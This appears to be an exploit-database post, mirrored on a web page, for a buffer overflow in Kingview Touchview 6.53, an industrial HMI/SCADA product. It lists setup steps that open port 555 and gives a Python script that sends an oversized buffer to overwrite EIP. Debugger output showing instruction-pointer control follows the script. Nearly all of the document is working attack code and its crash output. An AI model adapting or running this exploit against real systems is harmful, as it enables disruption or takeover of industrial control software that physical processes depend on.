扫码分享
验证:
体验盒子# Exploit Title: Kingview TouchviewEIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , thengo to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)
print "[+] Closing connection.."
s.close()
print "[+] Done!"
eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0 nv up ei pl nz na po
nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000
efl=00010202
41424344 ??
CALL TO STACK
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22
体验盒子
